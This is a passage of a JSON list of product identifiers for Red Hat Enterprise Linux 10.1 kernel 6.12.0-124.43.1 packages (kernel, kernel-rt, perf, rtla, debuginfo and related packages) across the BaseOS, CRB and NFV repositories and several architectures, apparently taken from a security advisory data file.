"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
